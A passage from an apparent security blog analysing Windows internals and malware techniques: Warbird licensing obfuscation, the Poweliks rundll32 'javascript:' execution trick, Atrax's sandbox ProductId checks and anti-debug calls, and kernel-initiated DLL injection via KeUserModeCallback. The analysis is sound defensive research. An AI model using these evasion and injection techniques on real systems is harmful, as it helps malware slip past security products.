} REASON_CONTEXT, *PREASON_CONTEXT;

The code which creates the power request and calls PowerCreateRequest is:
0:000> u calc+20e8
calc!WinMain+0x10bc:
002320e8 8d8424c0020000 lea eax,[esp+2C0h]
002320ef 50 push eax
002320f0 c78424c402000000000000 mov dword ptr [esp+2C4h],0
002320fb c78424c802000000000080 mov dword ptr [esp+2C8h],80000000h
00232106 ff1584e92a00 call dword ptr [calc!WARBIRD::g_FuncAddress+0x64 (002ae984)]
0023210c 8bf0 mov esi,eax
0:000> dps 002ae984 L1
002ae984 75d9dda5 KERNEL32!PowerCreateRequest

At address 002320f0, the Version field is initialized to 0 (POWER_REQUEST_CONTEXT_VERSION). The next instruction initializes the Flags field with the value 0x80000000, which is an undocumented field (only 0x1 and 0x2 values are documented on MSDN). The remaining of the structure is left uninitialized.

The use of this undocumented flag is not clear; however the maintainers of the drmemory open source project have already noted that not all the fields were correctly initialized (https://code.google.com/p/drmemory/issues/detail?id=1247).

When the power request is created, it is activated with a call to PowerSetRequest with the PowerRequestExecutionRequired request type. This request type allows the program to run instead of being suspended or terminated by process lifetime management mechanisms.

After this simple step, the remaining code of Warbird is quite difficult to reverse engineer. It seems that Microsoft used techniques such as function inlining in order to hide the sequence of operations.

After a long sequence of cryptographic-related operations, the program calls the versatile NtSetSystemInformation API with an information type of value 0x86. Microsoft only documents a small subset of the structures returned by this function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms724509%28v=vs.85%29.aspx). A rather up-to-date definition of the type of information that can be queried can be found in the sources of the Process Hacker open source project (http://processhacker.sourceforge.net/doc/ntexapi_8h_source.html). In this enumeration, 0x86 corresponds to SystemThrottleNotificationInformation.

Even if we did not dig into this system call, some people have done it and concluded this is a way to obfuscate calls to retrieve licensing information. In previous versions of the operating system, Microsoft used the NtQueryLicenseValue and SLGetWindowsInformation to retrieve licensing information. These calls were quite easy to intercept and fake. Starting from Windows 8, it seems Microsoft has chosen to change its implementation to make the licensing system harder to fake.

Having a look at the other dynamically resolved functions which are related to graphic display (mainly in gdi32.dll and user32.dll), we can assume that the whole process displays a watermark message on the screen if running a non-genuine version of Windows.

Extent of Warbird

So far, we highlighted some findings in the Windows Calculator provided with the 32-bit version of Windows 8.

But Warbird usage is not restricted to this simple program. This technique is embedded in a bunch of other Microsoft binary files, both in 32 bits and 64 bits. This technique is also present in the latest version of the operating system, Windows 8.1 Update 1 at the time of writing.

Microsoft tries to hide the details of this technique to the reversing community. For example, the Windows 8.1 Update 1 version of the Windows Calculator lacks any debug information related to Warbird.

However, some tracks are still present if you are interested in digging into this area.

For example, you can search for other affected binary files using a YARA (http://plusvic.github.io/yara/) rule matching the unusual pattern highlighted at the beginning of this article (32-bit version only):

/* Match the PEB.Ldr assembly for warbird function resolution */
rule WarBird
{
strings:
$a = {64 A1 30 00 00 00 2B CA D1 F9 8B 40 0C 83 C0 0C}
condition:
$a
}

This pattern will match some binary files, both in the ‘system32’ and the ‘Program Files folder’. You will eventually come across some binary files with debug information containing the private symbols of the Warbird implementation (even for Windows 8.1 Update 1 binary files).

Conclusion

The purpose of this blog post was to unveil the mechanisms used in some Windows binary files to obfuscate licensing related queries, and not licensing itself.

It is clear that Microsoft did some efforts to hide operations related to their licensing starting from Windows 8 version.

Even if some valuable information can still be retrieved from the debug symbols associated with the Windows binary files, Microsoft is about to remove the relevant information. We do not know the whole process of debug symbols publishing at Microsoft, but it seems private symbols are regularly present on their public symbol store. This source of information is quite valuable to reversers to understand new piece of technology or to access internal functionalities of the operating system.

Poweliks – Command Line Confusion

Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum kernelmode.info about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code.

I found it funny that we can execute some JavaScript through Rundll32 and obviously I was not the only one.

Capture d’écran 2014-08-20 à 15.57.26

When we first saw the command line executing JavaScript, we were wondering how it worked.

In this blog post, we analyze how and why JavaScript is executed when calling this simple command line:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

Reminder about Rundll32

Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file which can be achieved with the following command line:

RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

entrypoint is the exported function; its prototype must be:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

The lpszCmdLine parameter is given the <optional arguments> value specified on the rundll32 command line.

We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll and how the “javascript:” prefix is used to execute actual JavaScript code.

Analysis of Rundll32

Parameters

One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (‘,’, 0x2C) to locate the DLL name and for a space (‘ ‘, 0x20) to locate the entrypoint name.

Capture d’écran 2014-08-20 à 16.00.23

When using our sample command line, ParseCommand returns javascript:"\..\mshtml as the DLL name and RunHTMLApplication as the entrypoint. In this context, the space after RunHTMLApplication delimits the ‘optional arguments’ part of the rundll32 command line:

Capture d’écran 2014-08-20 à 16.01.37

Dll loader

Rundll32 will perform several tries to load the actual DLL from the initial specification javascript:"\..\mshtml.

The first test uses the function GetFileAttributes(“javascript:”\..\mshtml”). This function eventually accesses C:\Windows\system32\mshtml. As this file is not found, the function returns -1.

Capture d’écran 2014-08-20 à 16.04.07

SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeProcessSearchMode. The Microsoft definition of this key is:

When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0.

By default this registry key doesn’t exist (on Windows XP / 7 / 8) so SearchPath tries to load the file mshtml in the current directory of rundll32 (c:\windows\system32) prior to trying locating it in the system path.

Capture d’écran 2014-08-20 à 16.05.45

All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again searching for the manifest for the module: javascript:”\..\mshtml.manifest

Capture d’écran 2014-08-20 à 16.07.09 Since all the previous steps failed, Rundll32 eventually calls LoadLibrary("javascript:"\..\mshtml").

LoadLibrary is just a thin wrapper around LdrLoadDll located in ntdll.dll. Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:”\..\mshtml.dll as a path. The token .. instructs to go one folder up: it resolves to mshtml.dll (think of foo\..\mshtml.dll resolved as mshtml.dll).

With mshtml.dll specification, LdrLoadDll is able to load the library in the system directory.

Capture d’écran 2014-08-20 à 16.09.02 Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication.

For the moment, the javascript: prefix seems pretty useless: LoadLibrary("foobar:\"\..\mshtml") works fine. So, why prefixing with javascript:?

Protocols Handler

Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication.

Even if not documented, the actual RunHTMLApplication can be inferred from the call made by c:\windows\system32\mshta.exe (the application dedicated to launch an .hta file):

HRESULT RunHTMLApplication(
HINSTANCE hinst,
HINSTANCE hPrevInst,
LPSTR szCmdLine,
int nCmdShow
);

This is not far from the function prototype expected for a rundll32 entry point:

void CALLBACK EntryPoint(
HWND hwnd,
HINSTANCE hinst,
LPSTR lpszCmdLine,
int nCmdShow
);

RunHTMLApplication receives a handle to a window instead of a handle to a module as the first parameter. This parameter is used when mshml registers for a window class and creates a window of this new class. Passing a value not corresponding to an actual instance doesn’t seem to disturb user32 very much…

The second parameter is not used at all, so the mismatch is not important.

The last parameter, nCmdShow, is used by the RunHTMLApplication function to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT to instruct any potential opened window to use window default placement.

The main parameter of interest would be lpszCmdLine (";alert('foo')) in our case.

Capture d’écran 2014-08-20 à 16.16.36

This obviously leads to an issue since this is not a valid JavaScript statement (please note the missing double-quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and prefers to request again the original command line from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function).

Capture d’écran 2014-08-20 à 16.20.09

The full command line contains the name of the executable and the parameters: GetCmdLine extracts the parameters by cleaning up the executable specification:

Capture d’écran 2014-08-20 à 16.23.29

After that, RunHTMLApplication calls CreateUrlMoniker:

Capture d’écran 2014-08-20 à 16.25.04

This is where the string « javascript: » is essential.

CreateUrlMoniker parses the command line to extract the string before the char “:” (0x3A): “javascript”.
Capture d’écran 2014-08-20 à 16.28.27

CreateUrlMoniker crawls the registry key HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\. These keys refer to a set of protocols and their CLSID.

CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript):

Capture d’écran 2014-08-20 à 16.29.55

The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches « Microsoft HTML Javascript Pluggable Protocol ».

Capture d’écran 2014-08-20 à 16.31.51

It is for this reason that the string “javascript” is essential in the beginning of the parameters.

The same mechanism comes into play when one types javascript:alert(‘foo’); in the Internet Explorer navigation bar:

Capture d’écran 2014-08-20 à 16.34.18

The remaining of the string located after the ‘:’ separator is interpreted by the JavaScript URL moniker as JavaScript instructions:

"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

This is a valid JavaScript with a string "\..\mshtml,RunHTMLApplication " (hence the double-quotes skipped in all the previous steps!) and a function (alert).

Finally RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed:

Capture d’écran 2014-08-20 à 16.35.36

Security point

From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application.

In other words, we can have all the power of Internet Explorer—its object model, performance, rendering power and protocol support—without enforcing the strict security model and user interface of the browser. Zone security is off, and cross-domain script access is allowed, we have read/write access to the files and system registry on the client machine.

With this trick, JavaScript is executed outside the Internet Explorer process and script is not subject to security concept like Protected Mode / Sandbox on Vista and superior.

Conclusion

RunHTMLApplication has the perfect prototype to work with Rundll32. Attackers have made great efforts to build a command line using the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment.

From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32 while specifying the script to run without writing any file on the file system.

That’s all folks!

Win32/Atrax.A

Atrax is a malware discovered during the summer of 2013. It includes some basic features like distributed denial-of-service, keylogging, the ability to steal banking credentials, to send spam or to install a Bitcoin miner for crafting bitcoin money. The particularity of Atrax is that it communicates with command and control server over TOR, which is a protocol that enables online anonymity. An ESET blog post has been made to give more information about this tor based botnet: http://www.welivesecurity.com/2013/07/24/the-rise-of-tor-based-botnets/.

Atrax’s specification highlight us about anti-analyzer technics:

[...]
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
[…]

The sample we studied was seen in the wild in April 2014 and submitted to the VirusTotal web site (https://www.virustotal.com/en/file/adf246a57baecef5c8c85c60152e9b2f5060bf2e720ad1623cc95177e7259401/analysis/).

We choose to analyze the Atrax botnet in the process of our permanent security monitoring, in order to be sure that our best of breed HIPS engine is able to block new technics used by hackers. This article is not a full analysis of the malware, it chooses to focus on the capabilities to do not be detected or analyzed.

Sandbox detection

We started by looking at the anti-sandbox capability. To obtain a fast dynamic analysis of a potential malware, many online services provide sandbox capabilities to give you a deeper look of what the application is doing on the operating system: the principle is to start the malware execution in a virtual machine to trace its behavior. At the end of the timeout the service provides a report and sets the virtual machine to its initial state for the next analysis. In this way, we can quickly know if a binary file is malicious or not. Malwares now try to detect this kind of sandbox to be sure that people couldn’t analyze the behavior of the malware or that security solution couldn’t block it proactively.

To test the protection mechanism of Atrax, the sample was submitted to multiple online sandboxes:

  • Anubis http://anubis.iseclab.org/: when executing, the binary file crashes (STATUS_ACCESS_VIOLATION) preventing behavioral analysis. It is a normal behavior of Atrax when it detects online sandbox. The virtual machine was not infected.
  • Malwr http://malwr.com: the binary file runs normally, the virtual machine was infected.
  • JoeBox (CWSandbox / File-analyzer) http://file-analyzer.net/: The binary file runs normally, the virtual machine was infected.
  • Comodo http://camas.comodo.com: the binary file runs normally, the virtual machine was infected.

Except Anubis, it becomes clear that the detection of sandbox is not fully functional. This dysfunction is due to the method used for environment fingerprinting. Atrax simply looks for the ProductId of the operating system.

ProductId is a unique value of 20 digits which is derived from the product key and the hardware configuration. This key is just displayed to user for information. It can be used when you contact the Microsoft Support. This key is stored in the registry key located here: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId. You can display it by right-clicking My Computer and selecting Properties:

Capture d’écran 2014-08-20 à 14.37.28

 

Because it is unique, this key enables identifying the computer. However it is possible to alter this key without having any instability.

Atrax has an hardcoded list of ProductId keys:

-   1: 76487-640-1457236-23837
-   2: 76487-644-3177037-23510
-   3: 55274-640-2673064-23950
-   4: 76497-640-6308873-23835
-   5: 76487-640-1464517-23259

If it finds one these values, its means that the actual environment is an online sandbox and Atrax process exits with an access violation.

Capture d’écran 2014-08-20 à 14.39.33

 

In order to check the correspondence of these values, we developed a test program that display the ProductId value of the sandboxes available on Internet.

Some sandboxes report screenshots of the virtual machine, so it is easy to check the ProductId with a MessageBox. For sandboxes which do not report screenshot, the binary file creates a text file with the ProductId as filename.

long lResult =
RegOpenKeyEx(HKEY_LOCAL_MACHINE,L"Software\\Microsoft\\Windows NT\\CurrentVersion",0,KEY_QUERY_VALUE,&hkey );
if(ERROR_SUCCESS == lResult)
{
DWORD keytype;
TCHAR data[200];
DWORD bread=200;
lResult =
RegQueryValueEx(hkey,L"ProductId",NULL,&keytype,(BYTE*)&data,&bread);

if(ERROR_SUCCESS == lResult)
{
// Key found
MessageBox(0,data,L"fingerprint",1);
found = _tfopen(data, TEXT("w"));
fclose(found);
}

With this trick, we have determined that the first key (76487-640-1457236-23837) is the ProductId of Anubis sandbox. This is why the execution inside this sandbox turns into STATUS_ACCESS_VIOLATION.

The second and third keys do not work due to updated sandboxes. These keys are some kind of signature that matches CWSandbox and JoeBox.

76487-644-3177037-23510: matches CWSandbox.

55274-640-2673064-23950: matches JoeBox.

CWSandbox and JoeBox now appear to be a single product: JoeSecurity is accessed through the URL http://file-analyzer.net/. JoeSecurity now automatically generates a new key for each run, making the two previously known keys obsolete. But strangely they are a recognizable pattern easy to detect. For example:

Windows XP:
78387-783-7838756-78387
89955-899-8995528-89955

Windows 7:
24752-247-2475255-24752
65168-651-6516896-65168

Funny fact, during our tests we have to submit several times our fingerprint executable to be sure that the ProductId is unique at each run. This apparently did not please JoeSecurity and our IP address was simply banned from the server.

The last two keys 76497-640-6308873-23835 and 76487-640-1464517-23259 are less common and seem to be related to old instances of Malwr sandbox. Today Malwr generates a unique key for each run with no identifiable pattern:

43587-502-6867763-42122
65925-308-4191880-45994
68959-300-3102090-30654
27323-986-4834729-34486
69978-592-8045283-75626

In addition, although it is not implemented into Atrax, it is possible to detect if an executable file has been uploaded to VirusTotal; the sandbox associated to the “Behavioral information” section has always the same ProductId: 76487-341-0620571-22546.

As we can see, this technique is not really efficient for multiple reasons. First, because it is easy to implement a mechanism to auto generate a ProductId for each run. We tried to edit the ProductId of Windows 7 and Windows Update was fully functional. Moreover, looking at this registry key can be detected as a malicious behavior. It is not common for an executable file to look for the ProductId of the operating system.

Security products detection

Atrax also checksif security productshaveinjectedcode in therunning process of the malware.

To do this check, it uses a well-documented technics:

  • It finds PEB (Process Environment Block address) (instruction mov eax, fs :0x30)
  • It looks for Ldr (LoaderData) in PEB (instruction mov ecx, [eax+0x0C])
  • It finds the InLoadOrderLinks list which contain all the module loaded by the running process (instruction mov edi, [ecx+0x0C])
  • It browses InLoadOrderLinks and compares it to some values.

Capture d’écran 2014-08-20 à 14.54.36

 

For more information about this method: http://phrack.org/issues/65/10.html,

Atrax looks for the following loaded binary files to detect if a security product monitors the current application:

This technique is limited to a few security products but does not prevent detection by antivirus.

Anti Debug

Atrax uses 3 different technics to check the presence of a debugger.

ZwSetInformationThread

The first way to do it involves using the ZwSetInformationThread function.

NTSYSAPI NTSTATUS NTAPI ZwSetInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength
);

When ThreadInformationClass is set to 0x11 (ThreadHideFromDebugger), any debugger becomes blind to actions performed by this thread.

Capture d’écran 2014-08-20 à 15.00.56

 

ZwQueryInformationProcess

The second way to bypass debug involves using ZwQueryInformationProcess in order to find a debugger.

TSTATUS WINAPI ZwQueryInformationProcess(
_In_       HANDLE ProcessHandle,
_In_       PROCESSINFOCLASS ProcessInformationClass,
_Out_     PVOID ProcessInformation,
_In_       ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength
);

 

When ProcessInformationClass is set to 0x7 (ProcessDebugPort), ProcessInformation is set to -1 when the process is being debugged.

Capture d’écran 2014-08-20 à 15.03.33

 

IsDebuggerPresent

Finally, Atrax uses the classical IsDebuggerPresent function call which looks for the BeingDebugged flag inside the PEB. If BeingDebugged equals 1, the process is debugged.

AntiVM

Malware’s specifications refer to VM detection. This functionality seems not to be included into the sample that has been studied but we can find some significant strings inside the binary file:

  • VMWare
  • VBOX
  • DiskVirtual_HD

It looks like some codes about VM detection is present but after static analysis we saw that this part of code is never called.

Conclusion

In this post we have seen that an effort was made to detect security products but the detection of analysis environment are not really well implemented. One year after malware launch, it’s fully detected by the sandboxes and the tricks used here are not efficient.Yet there are a huge number of tricks documented on the Internet for anti-debug, anti-VM and anti-analysis. Atrax uses only the most basics tests.

For further information, please see:
http://waleedassar.blogspot.comhttp://pferrie.host22.com/papers/antidebug.pdf

Linux known exploit detection

The integration of a new patch into the Linux kernel has been proposed to enable the successful detection of exploitation attempts.

The principle is very simple: when a security fix is added to the kernel, a new code will be added to call the “ exploit” function (with the CVE number of the exploit that is being patched, for example). Then, if someone tries to exploit this vulnerability, the attempt will be unsuccessful because the vulnerability has been patched, but the exploit function will be called in order to log the exploitation attempt.

This concept has several advantages because when a malicious attacker successfully roots your Linux system, chances are that your system wouldn’t log anything, but if an exploitation attempt fails, you will be able to log some information in the system.

So the argument in favor of this functionality is that most hackers will try multiple exploits before they succeed in breaking into your system for many reasons, such as not knowing your Linux kernel version, or probably  because they are script kiddies who use exploitation kits that will try to run multiple exploits.

The main detractors of this new security function claim that attackers, after successfully exploiting the system (with an exploit that is not patched), will be able to delete the logs that have been created by the exploit function. A suggestion would be to log it immediately on an external syslog server (or directly to a SOC if the organization has one).

Another potential issue is that after years of patching the kernel, a lot of annotations and exploit function calls would be present in the Linux source code. In order to keep the kernel as clean as possible, an idea would be to delete these annotations after a few years (a vulnerability has few chances of being tested if is 3 years old).

What is interesting is that even if it is based on signatures and has no chance of proactively detecting a 0day exploitation, this technique would give you precious information about hacking attempts in your organization.

Also, you might think that if you have a NIPS (Network Intrusion Prevention System) you would be able to detect these attempts without having such features in your kernel.

The problem is that your NIPS engine will be based on a signature approach, and there are plenty of techniques to bypass this approach. Advanced Evasion Techniques (AET) are a good example.

The Linux known exploit detection is also beneficial because it won’t analyze the shellcode of the exploitation (which might change or might use polymorphism to easily bypass the detection engine) but would detect the vulnerability exploitation directly. In this case you will prevent false positives.

This functionality is not considered a “must-have” that would solve all your problems: you won’t be protected against 0day attacks and you will still need to patch your operating system. It would not replace one of your security layers, but it can be considered a “nice-to-have”.

These precious logs have a value only if you know what to do when such an alert is raised: you have to define a manual or automated process that will, for example, investigate on what’s going on in order to block the attacker.

We hope that third party vendors will copy this initiative, and it would also make a lot of sense that Adobe Acrobat warns you about vulnerability exploitation attempts in your system.

How to run userland code from the kernel on Windows

Introduction

Before Windows NT 4.0, the graphical part of the Windows subsystem was implemented completely in userland. Starting from NT 4.0 Microsoft decided to move a large part of the Window Manager and the Graphics Device Interface to kernel-mode in the Win32k.sys component. However, part of the implementation is still present in userland and the kernel component needs to call back user-mode code. To do so, Microsoft implemented a ‘reverse’ system call, allowing the kernel to call userland code. The whole process has already been discussed and explained in previous articles so we will not detail it again. Please refer to Tarjei Mandt white paper that contains a comprehensive description of the mechanism. In this post, we detail how Windows (from Windows XP to Windows 8) uses this mechanism to load modules in running processes. Understanding the mechanism may allow you to use it for your own purposes, in particular as a way to inject custom DLLs in processes while running code in the kernel portion of the Windows operating system. A recent article published by @zer0mem uses the ‘reverse’ system call mechanism to execute code in user-mode from kernel code. This post offers an alternative approach if you are free to drop a Windows binary file on the file system.


User-mode callbacks walkthrough

General mechanism

The function that enables to call user code from kernel is located inside the Windows kernel and is an exported function named KeUserModeCallback. The prototype of KeUserModeCallback is

The initialization takes place in the function user32!UserClientDllInitialize (the entry point of the user32 DLL) and basically makes the KernelCallbackTable field point to the non-exported user32!apfnDispatch symbol.

NTSTATUS KeUserModeCallback (
IN ULONG ApiNumber,
IN PVOID InputBuffer,
IN ULONG InputLength,
OUT PVOID *OutputBuffer,
OUT PULONG OutputLength
);

Since this function is not present in any WDK header, you have to retrieve it dynamically with the help of an MmGetSystemRoutineAddress call.

What this function basically does is copying these parameters onto the userland stack and returning back to userland code (in ntdll!KiUserCallbackDispatcher function).

Callable functions are identified by the ApiNumber parameter. This is a zero-based index in an array accessible through the KernelCallbackTable field of the Process Environment Block.

This field is initialized when the user32 module is loaded in the process (before initialization, the field is NULL). The initialization takes place in the function user32!UserClientDllInitialize (the entry point of the user32 DLL) and basically makes the KernelCallbackTable field point to the non-exported user32!apfnDispatch symbol.

kd> dt nt!_PEB @$peb
+0x000 InheritedAddressSpace : 0 ''
+0x001 ReadImageFileExecOptions : 0 ''
+0x002 BeingDebugged : 0 ''
+0x003 SpareBool : 0 ''
+0x004 Mutant : 0xffffffff Void
+0x008 ImageBaseAddress : 0x00400000 Void
+0x00c Ldr : 0x00251e90 _PEB_LDR_DATA
+0x010 ProcessParameters : 0x00020000 _RTL_USER_PROCESS_PARAMETERS
+0x014 SubSystemData : (null)
+0x018 ProcessHeap : 0x00150000 Void
+0x01c FastPebLock : 0x7c990620 _RTL_CRITICAL_SECTION
+0x020 FastPebLockRoutine : 0x7c911000 Void
+0x024 FastPebUnlockRoutine : 0x7c9110e0 Void
+0x028 EnvironmentUpdateCount : 1
+0x02c KernelCallbackTable : 0x7e392970 Void
+0x030 SystemReserved : [1] 0
+0x034 AtlThunkSListPtr32 : 0
...

This table contains function pointers to various userland callable functions, all of them located in the user32 module. The contents (thus the index of the functions) and the length of the table depend on the operating system version.

Here is an example (truncated) displaying a function table in the Windows XP SP3 32 bits process:

kd> dps 0x7e392970 L0n98
7e392970 7e3a7f3c USER32!__fnCOPYDATA
7e392974 7e3d87b3 USER32!__fnCOPYGLOBALDATA
...
7e392a38 7e3d8eb9 USER32!__ClientCopyDDEIn1
7e392a3c 7e3d8efb USER32!__ClientCopyDDEIn2
7e392a40 7e3d8f5e USER32!__ClientCopyDDEOut1
7e392a44 7e3d8f2d USER32!__ClientCopyDDEOut2
7e392a48 7e3aeb09 USER32!__ClientCopyImage
7e392a4c 7e3d8f92 USER32!__ClientEventCallback
7e392a50 7e3b19f6 USER32!__ClientFindMnemChar
7e392a54 7e3a28f3 USER32!__ClientFontSweep
7e392a58 7e3d8e4c USER32!__ClientFreeDDEHandle
7e392a5c 7e3a82ff USER32!__ClientFreeLibrary
7e392a60 7e39f4b2 USER32!__ClientGetCharsetInfo
7e392a64 7e3d8e83 USER32!__ClientGetDDEFlags
7e392a68 7e3d8fdc USER32!__ClientGetDDEHookData
7e392a6c 7e3cf9f5 USER32!__ClientGetListboxString
7e392a70 7e39ec46 USER32!__ClientGetMessageMPH
7e392a74 7e3a16eb USER32!__ClientLoadImage
7e392a78 7e3a8023 USER32!__ClientLoadLibrary
7e392a7c 7e3aec03 USER32!__ClientLoadMenu
7e392a80 7e39ee0d USER32!__ClientLoadLocalT1Fonts
7e392a84 7e3a09e4 USER32!__ClientLoadRemoteT1Fonts
7e392a88 7e3d907b USER32!__ClientPSMTextOut
7e392a8c 7e3d90d1 USER32!__ClientLpkDrawTextEx
7e392a90 7e3d9135 USER32!__ClientExtTextOutW
7e392a94 7e3d919a USER32!__ClientGetTextExtentPointW
7e392a98 7e3d9019 USER32!__ClientCharToWchar
7e392a9c 7e39ed14 USER32!__ClientAddFontResourceW
7e392aa0 7e39a13e USER32!__ClientThreadSetup
7e392aa4 7e3d9253 USER32!__ClientDeliverUserApc
7e392aa8 7e3d91f1 USER32!__ClientNoMemoryPopup
7e392aac 7e3aa740 USER32!__ClientMonitorEnumProc
7e392ab0 7e3d944a USER32!__ClientCallWinEventProc
7e392ab4 7e3d8e15 USER32!__ClientWaitMessageExMPH
7e392ab8 7e3acf8e USER32!__ClientWOWGetProcModule
7e392abc 7e3d948d USER32!__ClientWOWTask16SchedNotify
7e392ac0 7e3d9266 USER32!__ClientImmLoadLayout
7e392ac4 7e3d92c2 USER32!__ClientImmProcessKey
...
7e392af4 7e3d950c USER32!__fnOUTLPSCROLLBARINFO

Conditions for calling KeUserModeCallback

Before calling KeUserModeCallback, you must first check the KernelCallbackTable field of the Process Environment Block is not NULL (KeUserModeCallback will not do this for you). This field is at offset 0x2c on a 32-bit system and 0x58 on a 64-bit system (from Windows XP to Windows 8). Omitting to do so will eventually lead to a BSOD.

On Windows XP, the operating system does not place any condition on the state of the current thread for calling the KeUserModeCallback function, so it is safe calling the function whenever you want.

Starting from Windows Vista, things are different. Indeed, the KeUserModeCallback function checks for the presence of the CallOutActive flag in the Flags field of the current _KTHREAD structure (this field is set at least by the nt!KeExpandKernelStackAndCalloutEx function). If present, the operating system issues a bugcheck with a 0x107 undocumented code.

On Windows 8, the Microsoft developers added even more constraints to allow the call to succeed.

The first check performed by Windows 8 is ensuring the current thread runs at PASSIVE_LEVEL. If not, the operating system issues a bugcheck with code 0x4A (IRQL_GT_ZERO_AT_SYSTEM_SERVICE).

Then, the operating system checks if APCs are enabled. If not, the operating system issues a bugcheck with code 1 (APC_INDEX_MISMATCH).

Finally, the operating system checks the CallbackNestingLevel field of the current thread. If this value reaches 32, the function fails with a code equals to 0xC00000FD (STATUS_STACK_OVERFLOW). This field is set by KeUserModeCallback to record the number of nested calls to user-mode callbacks.


 User-mode callback for loading a library

Among the interesting functions, we can notice the user32!__ClientLoadLibrary function pointer.

This functionality is natively used by win32k.sys to inject the uxtheme.dll in running processes, allowing the operating system to apply visual styles to applications.

This operation is twofold. First, it effectively loads the module in the process memory, as if it were loaded by userland code. Then, a function called ThemeInitApiHook is invoked giving uxtheme.dll a chance to provide alternate implementations for various functions used by user32. We will not dive into the details of how this initialization function is called and what the patched functions are used for. We will just try to describe the parameters needed to load a module without calling any specific initialization function.

Function index

The first parameter requested is the ApiNumber. The value for the ‘load library’ feature depends on the operating system version.

Capture d’écran 2014-04-08 à 16.51.22
From now on, the index does not depend on the operating system flavor (32 bits or 64 bits).

Input buffer

The second and third parameters of the functions are the input buffer and its associated length, in bytes.

The input buffer for the ‘load library’ feature is described by the following structure:

typedef struct _USERHOOK
{
DWORD      dwBufferSize;
DWORD      dwAdditionalData;
DWORD      dwFixupsCount;
LPVOID     pbFree
DWORD      offCbkPtrs;
DWORD      bFixed;
UNICODE_STRING lpDLLPath;
union
{
DWORD      lpfnNotify
UNICODE_STRING lpInitFunctionName;
}
DWORD      offCbk[2];
} _USERHOOK_s;

This structure is a specialization of a more general mechanism that exists in the win32k.sys driver for user-mode callbacks: it is composed of a fixed header (from dwBufferSize to bFixed) and a variable-length data (starting from lpDLLPath).

dwBufferSize contains the length of the whole buffer, including the variable-length data.
dwAdditionalData contains the length of the variable-length data.
pbFree is a pointer to the end of the variable-length data.

We will not go into the implementation details of how this dynamic buffer is allocated and the previous fields are used by the Windows routines. We just have to mimic the way the buffer is filled in in order to call KeUserModeCallback.

Note: you can have a look at the win32k!AllocCallbackMessage and win32k!CaptureCallbackData functions called by win32k!ClientLoadLibrary if you want to understand how this structure is allocated and updated.

Relocatable buffer

The buffer supplied by the caller of KeUserModeCallback resides in kernel memory. The buffer must eventually resides in the user memory of the process (it is copied on the userland stack) in order to be handled by the userland functions.

In order to make the buffer location-independent, the Windows developers implemented a simple mechanism consisting of ‘fix-ups’. If the bFixed is FALSE, every pointer does not contain an address but an offset relative to the beginning of the structure.

Let’s take for example the buffer passed to the user32!__ClientLoadLibrary on a Windows XP 32 bits:

kd> db ef5a78e0 L68
ef5a78e0 68 00 00 00 40 00 00 00-01 00 00 00 48 79 5a ef h...@.......HyZ.
ef5a78f0 24 00 00 00 00 00 00 00-3e 00 40 00 28 00 00 00 $.......>.@.(...
ef5a7900 40 9e 00 00 1c 00 00 00-43 00 3a 00 5c 00 57 00 @.......C.:.\.W.
ef5a7910 49 00 4e 00 44 00 4f 00-57 00 53 00 5c 00 73 00 I.N.D.O.W.S.\.s.
ef5a7920 79 00 73 00 74 00 65 00-6d 00 33 00 32 00 5c 00 y.s.t.e.m.3.2.\.
ef5a7930 75 00 78 00 74 00 68 00-65 00 6d 00 65 00 2e 00 u.x.t.h.e.m.e...
ef5a7940 64 00 6c 00 6c 00 00 00 d.l.l...
dwBufferSize: 0x68
dwAdditionalData: 0x40
dwFixupCounts: 1
pbFree: 0xef5a7948
offCbkPtrs: 0x24 -> 0xef5a7904
bFixed : FALSE
lpDLLPath : (Length: 0x3e, MaximumLength: 0x40, Buffer: 0x28)

The buffer contains 1 fix-up (dwFixupsCount = 1). The array containing this fix-up is at offset 0x24 from the beginning of the structure (thus residing at address 0xef5a7904). The first and only element of this array is the offset of the value to fix: it is the UNICODE_STRING buffer (value 0x28 at offset 0x1c). After being fixed, the buffer points to the real memory address (0xef5a78e0+ 0x28 = 0xef5a7908).

This resolution is performed by the FixupCallbackPointers function of user32, after the buffer has been copied to the user land stack.

The code for this function looks like:

